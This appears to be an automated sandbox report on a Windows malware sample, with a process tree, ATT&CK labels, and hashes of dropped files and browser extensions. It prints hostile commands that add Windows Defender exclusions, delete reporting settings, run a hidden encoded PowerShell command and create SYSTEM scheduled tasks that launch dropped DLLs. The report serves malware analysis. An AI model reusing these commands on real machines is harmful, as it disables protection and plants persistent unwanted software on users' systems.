                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2132
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:64
                                                  3⤵
                                                    PID:4340
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3280
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR" /t REG_DWORD /d 0 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4028
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TUiypwAeSPRUPoVB /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3568
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TUiypwAeSPRUPoVB /t REG_DWORD /d 0 /reg:64
                                                    3⤵
                                                      PID:2420
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1912
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:512
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                        PID:3668
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                          PID:3176
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce /t REG_DWORD /d 0 /reg:32
                                                          3⤵
                                                            PID:4932
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:1600
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dwSOvWKysCpEXQRJ /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3220
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dwSOvWKysCpEXQRJ /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2312
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "gPbVpIvkc" /SC once /ST 15:20:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                            2⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:3984
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "gPbVpIvkc"
                                                            2⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:60
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /DELETE /F /TN "gPbVpIvkc"
                                                            2⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2484
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "nWibDlWEYQvBMTcbY" /SC once /ST 15:26:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dwSOvWKysCpEXQRJ\LHRQGZHOzQUOick\YimqzhV.exe\" dH /site_id 525403 /S" /V1 /F
                                                            2⤵
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4460
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "nWibDlWEYQvBMTcbY"
                                                            2⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2904
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                          1⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5024
                                                          • C:\Windows\system32\gpupdate.exe
                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                            2⤵
                                                              PID:3716
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                            1⤵
                                                              PID:4428
                                                            • C:\Windows\system32\gpscript.exe
                                                              gpscript.exe /RefreshSystemParam
                                                              1⤵
                                                                PID:3004
                                                              • C:\Windows\Temp\dwSOvWKysCpEXQRJ\LHRQGZHOzQUOick\YimqzhV.exe
                                                                C:\Windows\Temp\dwSOvWKysCpEXQRJ\LHRQGZHOzQUOick\YimqzhV.exe dH /site_id 525403 /S
                                                                1⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Drops Chrome extension
                                                                • Drops desktop.ini file(s)
                                                                • Drops file in System32 directory
                                                                • Drops file in Program Files directory
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:728
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "bIqjSKjLtvGhSJBNfA"
                                                                  2⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4436
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                  2⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3864
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                    3⤵
                                                                      PID:4712
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                    2⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2824
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                      3⤵
                                                                        PID:2240
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CbVqBnigU\ieCXQA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bztBruNizUuNfHs" /V1 /F
                                                                      2⤵
                                                                      • Drops file in Windows directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:1800
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "bztBruNizUuNfHs2" /F /xml "C:\Program Files (x86)\CbVqBnigU\Zzokaxr.xml" /RU "SYSTEM"
                                                                      2⤵
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:4168
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /END /TN "bztBruNizUuNfHs"
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3436
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /DELETE /F /TN "bztBruNizUuNfHs"
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4408
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "hpWLSRGERLRKoG" /F /xml "C:\Program Files (x86)\LfKWeIlHqQBU2\NksIgvX.xml" /RU "SYSTEM"
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:4924
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "pWIwWZcWAJruX2" /F /xml "C:\ProgramData\TUiypwAeSPRUPoVB\HtUlaDJ.xml" /RU "SYSTEM"
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:3640
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "jOUdPvOmNcXjfFJDH2" /F /xml "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR\HvSLAGe.xml" /RU "SYSTEM"
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:3576
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "OVRxarSquweWmEViUFO2" /F /xml "C:\Program Files (x86)\ardKySDqUVkhC\BVaJxzb.xml" /RU "SYSTEM"
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:2324
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "AYwEeuzLnMnSOnskF" /SC once /ST 01:38:36 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dwSOvWKysCpEXQRJ\fLakIkCM\UmERuDg.dll\",#1 /site_id 525403" /V1 /F
                                                                      2⤵
                                                                      • Drops file in Windows directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:4392
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /run /I /tn "AYwEeuzLnMnSOnskF"
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2340
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3972
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                        3⤵
                                                                          PID:4552
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                        2⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2520
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4084
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /DELETE /F /TN "nWibDlWEYQvBMTcbY"
                                                                        2⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3940
                                                                    • C:\Windows\system32\rundll32.EXE
                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dwSOvWKysCpEXQRJ\fLakIkCM\UmERuDg.dll",#1 /site_id 525403
                                                                      1⤵
                                                                        PID:3600
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dwSOvWKysCpEXQRJ\fLakIkCM\UmERuDg.dll",#1 /site_id 525403
                                                                          2⤵
                                                                          • Blocklisted process makes network request
                                                                          • Checks BIOS information in registry
                                                                          • Loads dropped DLL
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Enumerates system info in registry
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:3152
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "AYwEeuzLnMnSOnskF"
                                                                            3⤵
                                                                              PID:5048

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Program Files (x86)\CbVqBnigU\Zzokaxr.xml

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          0ab91d76e22fa1a9f889a82e1791e519

                                                                          SHA1

                                                                          d4d5aa8c9cdfdeb35fb15c66e8610b473c3470f3

                                                                          SHA256

                                                                          96b3a8e473a56bd21d6545401b9a62622cae89834fa3c132ba2a9fba07942763

                                                                          SHA512

                                                                          d46cfd71550a942668a4798a1cf5f471103360db98adb4c6a589c51955edf8cc5b0c0a37afb21e49fe5a9f8088e9c16d8457731861eaf8f9db7c83de8da370d6

                                                                        • C:\Program Files (x86)\LfKWeIlHqQBU2\NksIgvX.xml

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          7f6868f1f1c1d3a75c863bea7b1576dd

                                                                          SHA1

                                                                          d11c369e7ef1a33390c33a19d895dadd5ea32a46

                                                                          SHA256

                                                                          dc843e7b6c6bdd738677a758d3f059e97b54cc477b8798a829a977010e36edd1

                                                                          SHA512

                                                                          22ee1e5fff78f5753fa3ce05f82a4ed399f7d6d3058f9637afa046b40a780c48df461bbda892060bb8430a7b3a7b7b12e7bf3ff9a68329ff941dd3c6200ccf6c

                                                                        • C:\Program Files (x86)\ardKySDqUVkhC\BVaJxzb.xml

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          25c0472b4f5078f31616362e2345cdf8

                                                                          SHA1

                                                                          d37b52d48bacc6f24ed51046306c8e3f93ce0cdb

                                                                          SHA256

                                                                          1f940cf1f354b61b1af4b854ecf8ac34702034a9b00afa53f1afd74e20ace076

                                                                          SHA512

                                                                          162e05beae2e62c53e43b76bf23cd09f6e7e5b9bcef4846e2f7a5b71f7f62f49eb5c780a487452a7797821f289ee472f36d88d5b82fd3c22767a6de8435c81f9

                                                                        • C:\Program Files (x86)\xQNizQXsNpkyKPuIghR\HvSLAGe.xml

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          3a500e78e6c9a670a0e1f4432e84d7cd

                                                                          SHA1

                                                                          4b5b6a6c2de68ca42197ccd5113c7a3ecd90e018

                                                                          SHA256

                                                                          22813be5325131c02f4083e5a68e7bfdb21e45b25dc2b9f3f995383196a2a6ce

                                                                          SHA512

                                                                          f1931a2d912b0b9e5e1965974088250927817220b5c91a6575b2f72d03fb60d6dc2b375d26718e3c3327cf994fe99a9acbc5f968648db62ad644aab49c5363ff

                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                          Filesize

                                                                          1.2MB

                                                                          MD5

                                                                          1a5ff0f5fe9e03e2fc46c44a9c6938ce

                                                                          SHA1

                                                                          95796f74df17bda4bf0e4259e9188229568a4a3b

                                                                          SHA256

                                                                          fb659bbbed14a07730e73836434493f295bac8b984012d3fd9514357cb3b51a9

                                                                          SHA512

                                                                          16279c5fd445164cdc159e9eb44e9470cda98fa7267c981cc8da4d45df2a67178e32dd1f9ca3c595153c98c529ad27c4c65a4ce672d2229b3662bd946e2ba3a1

                                                                        • C:\ProgramData\TUiypwAeSPRUPoVB\HtUlaDJ.xml

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          11fcf694a090255a143344c24f249bb0

                                                                          SHA1

                                                                          4d74916bdac30678e0934863e575d624058daebd

                                                                          SHA256

                                                                          39e42d714d12d46e5fd63e96672a7d3654404f39f5ca2c0082876f6da0672b2f

                                                                          SHA512

                                                                          7d0650ea7940692a2c5da7c40a47b027ac0b99492583dfeea167c49dae9121d8f955adb1d1746c9481adf98e6373fd0a394d956e9f808ac5e399627bafede792

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                          Filesize

                                                                          187B

                                                                          MD5

                                                                          2a1e12a4811892d95962998e184399d8

                                                                          SHA1

                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                          SHA256

                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                          SHA512

                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                          Filesize

                                                                          136B

                                                                          MD5

                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                          SHA1

                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                          SHA256

                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                          SHA512

                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                          Filesize

                                                                          150B

                                                                          MD5

                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                          SHA1

                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                          SHA256

                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                          SHA512

                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          6cf293cb4d80be23433eecf74ddb5503

                                                                          SHA1

                                                                          24fe4752df102c2ef492954d6b046cb5512ad408

                                                                          SHA256

                                                                          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                          SHA512

                                                                          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json

                                                                          Filesize

                                                                          151B

                                                                          MD5

                                                                          bd6b60b18aee6aaeb83b35c68fb48d88

                                                                          SHA1

                                                                          9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                          SHA256

                                                                          b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                          SHA512

                                                                          3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                          Filesize

                                                                          11KB

                                                                          MD5

                                                                          05aeb669e76cc5d8d932f00e13652363

                                                                          SHA1

                                                                          32836a476118499721f50a46298177a21e529d1c

                                                                          SHA256

                                                                          de49dcdc647cc483482797a06147ddcc859b07e1666926072a81fc3fb141250d

                                                                          SHA512

                                                                          1c9fd7f1568b7ec0954de753a476f333b30a949e418418fe9d79bedaecfd6836d174626f0a4d93cd4189af3f120965714aeac857ac2d646e95be5ed894f75b29

                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          64B

                                                                          MD5

                                                                          5caad758326454b5788ec35315c4c304

                                                                          SHA1

                                                                          3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                                          SHA256

                                                                          83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                                          SHA512

                                                                          4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSBF58.tmp\Install.exe

                                                                          Filesize

                                                                          6.3MB

                                                                          MD5

                                                                          bbab6c52e9c95497cbd7807827f98dec

                                                                          SHA1

                                                                          b3688d1fd87bbac50d6b129d28d13bf017bb2e08

                                                                          SHA256

                                                                          38249f277c58596f557a93ba453ab7677c11ff58ebd01f40eecfedc5be94fa0a

                                                                          SHA512

                                                                          59f7472a0e1405cae428b06da76a5feaaa77a908bf2b58cba604fd691c3add9140ddeeaec890e00bc622a5b3b1fb0f9f91a9d14fcae348e16b87430062a96782

                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC311.tmp\Install.exe

                                                                          Filesize

                                                                          6.8MB

                                                                          MD5

                                                                          37785831780e9113d8ca1266ce065025

                                                                          SHA1

                                                                          d983a3a3c4aa277fc22cbf223f4b8f085f0d8ea8

                                                                          SHA256

                                                                          093fa153cdeb2c77ce754e1ad44ef4a4eb8db2e5670b9e631130924fc2e20c8e

                                                                          SHA512

                                                                          6ebdd08b4bf8d2ff23061256226cd7a539b5ade27cc8af098b3605eff9d36c80238c5195fdc6836b01fb231537943b77856fc0e30d66006ccbc0c73cd3960ce8

                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m43vnw1u.bwe.ps1

                                                                          Filesize

                                                                          60B

                                                                          MD5

                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                          SHA1

                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                          SHA256

                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                          SHA512

                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs.js

                                                                          Filesize

                                                                          10KB

                                                                          MD5

                                                                          451364b2379b3429d50c5e78d158e72b

                                                                          SHA1

                                                                          0c844eeaa5e703ee43d3b7ee24b599dcd2ad14ff

                                                                          SHA256

                                                                          8ceeec267738505bf2241a8d83754516a1305fb192cbb3e3fc843567dd035e6c

                                                                          SHA512

                                                                          fb2effc185523557f4f8b9a31d6bbe0fa5335922d660960b6ffdd3ad2e03fe9f22930a7620023779672e8ac8e9c6a08894c805b3646e6423d35c6219c58744b4

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          33b19d75aa77114216dbc23f43b195e3

                                                                          SHA1

                                                                          36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                          SHA256

                                                                          b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                          SHA512

                                                                          676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Filesize

                                                                          11KB

                                                                          MD5

                                                                          c008bbadae058039a3c212a499216859

                                                                          SHA1

                                                                          0eae5dc35565495bcf3b29bdb811726143a115f2

                                                                          SHA256

                                                                          da2ed4925b3a58b516ba84fd5971a11806dd0a965fe5db297da43a81f94e67a0

                                                                          SHA512

                                                                          4c73669071d8514fbcc7be9f6ae74e5d1691d552b9e7814281b5a137ad0c0b3ce34682a6f28fc58e3688d9cc2ae194cc09230ec1ab0b6be28a613ce02bbfcf7c

                                                                        • C:\Windows\Temp\dwSOvWKysCpEXQRJ\fLakIkCM\UmERuDg.dll

                                                                          Filesize

                                                                          6.2MB

                                                                          MD5

                                                                          2f3c4a81976f25cafaee10ffa098251e

                                                                          SHA1

                                                                          b0b9035e59a4c3f594d459bd69bb024eab6dc15d

                                                                          SHA256

                                                                          d411a53bc52ccc475bf2e851c943e8653a22e93c3e9fcc029f1c29a7161e45f4

                                                                          SHA512

                                                                          c1910203ef4bb3c74e3b150ac81273fb0ae8abdac349af128343324c9b7b9f602dbd8dc66524724904499df53bea1fc147dcb5d9198961fd2b669225d768fdcc

                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                          Filesize

                                                                          6KB

                                                                          MD5

                                                                          c845d9138963a31065f490336ef35243

                                                                          SHA1

                                                                          3825626d7f6328d027974a3e67c9a1dee6958d11

                                                                          SHA256

                                                                          3312b77054b6433c8d08b5980af9e1e2ba66a3a1c6e88ca68d8118e2bfbe02d0

                                                                          SHA512

                                                                          97915f0129b2f2e2694259571a26cd6eafabec5c81d3e9b4b5a5b369fc503f1500e7eb2d0564e2bdca123be6182b156ba9dc0cabfa7ed427d4dfcb18d5e94146

                                                                        • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                          Filesize

                                                                          268B

                                                                          MD5

                                                                          a62ce44a33f1c05fc2d340ea0ca118a4

                                                                          SHA1

                                                                          1f03eb4716015528f3de7f7674532c1345b2717d

                                                                          SHA256

                                                                          9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                          SHA512

                                                                          9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                        • memory/640-12-0x0000000010000000-0x0000000011000000-memory.dmp

                                                                          Filesize

                                                                          16.0MB

                                                                        • memory/728-97-0x00000000048F0000-0x0000000004975000-memory.dmp

                                                                          Filesize

                                                                          532KB

                                                                        • memory/728-444-0x0000000005A20000-0x0000000005A95000-memory.dmp

                                                                          Filesize

                                                                          468KB

                                                                        • memory/728-458-0x0000000005C60000-0x0000000005D16000-memory.dmp

                                                                          Filesize

                                                                          728KB

                                                                        • memory/728-139-0x0000000004F40000-0x0000000004FA3000-memory.dmp

                                                                          Filesize

                                                                          396KB

                                                                        • memory/1508-16-0x0000015BDFC70000-0x0000015BDFC92000-memory.dmp

                                                                          Filesize

                                                                          136KB

                                                                        • memory/2856-50-0x00000000051C0000-0x0000000005514000-memory.dmp

                                                                          Filesize

                                                                          3.3MB

                                                                        • memory/2856-39-0x0000000004E10000-0x0000000004E76000-memory.dmp

                                                                          Filesize

                                                                          408KB

                                                                        • memory/2856-38-0x0000000004610000-0x0000000004632000-memory.dmp

                                                                          Filesize

                                                                          136KB

